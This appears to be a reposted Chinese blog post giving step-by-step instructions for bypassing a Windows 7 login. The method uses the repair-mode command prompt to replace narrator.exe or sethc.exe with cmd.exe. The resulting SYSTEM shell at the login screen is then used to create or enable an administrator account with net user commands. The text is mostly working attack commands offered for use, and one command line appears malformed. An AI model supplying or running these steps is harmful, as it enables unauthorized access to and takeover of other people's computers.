Windows密码本地破解通用方法

网络整理 - 07-26
Windows密码本地破解通用方法



其实这个方法很多人都知道,不过最近尝试了破解最新的win7 64发现依然有效,给不知道的朋友分享下 



其思路就是替换讲述人narrator.exe(或者粘滞键sethc.exe)注意,各个系统可能不太一样,注意扩展思维。 



win7 下唯一的难点就是怎么替换了,试了pe,权限不够,也改不了,算了,估计盘有问题,那么去win7 新出的 修复模式看看吧^_^ 



开机,F8,修复模式,用户选择administrator,密码为空,进入后选命令提示符那项,后面就不用我说了吧?O(∩_∩)O哈哈~ 



不过唯一注意的一点是,这里虽然是system权限,比安全模式中要高,但是默认所在盘符并非系统盘(虽然也有windows文件夹)!请自行切换到系统盘, 



cd /d D:\windows\system32 



copy narrator.exe narrator2.exe 



del narrator.exe 



copy cmd.exe narrator.exe 



(同理可以替换sethc.exe) 

    

然后重启,登陆页面调出讲述人,就会有system权限的cmd,呵呵, 



net user login007 /add 



net user 123 



net localgroup Administrators login007 /add 

或者直接 net user administrator /active:y 
  

注意:之所以不在修复模式下直接用net user administrator /active:y 的方式启用,原因是里面修改的并非硬盘上系统分区的密码!

作者 haige18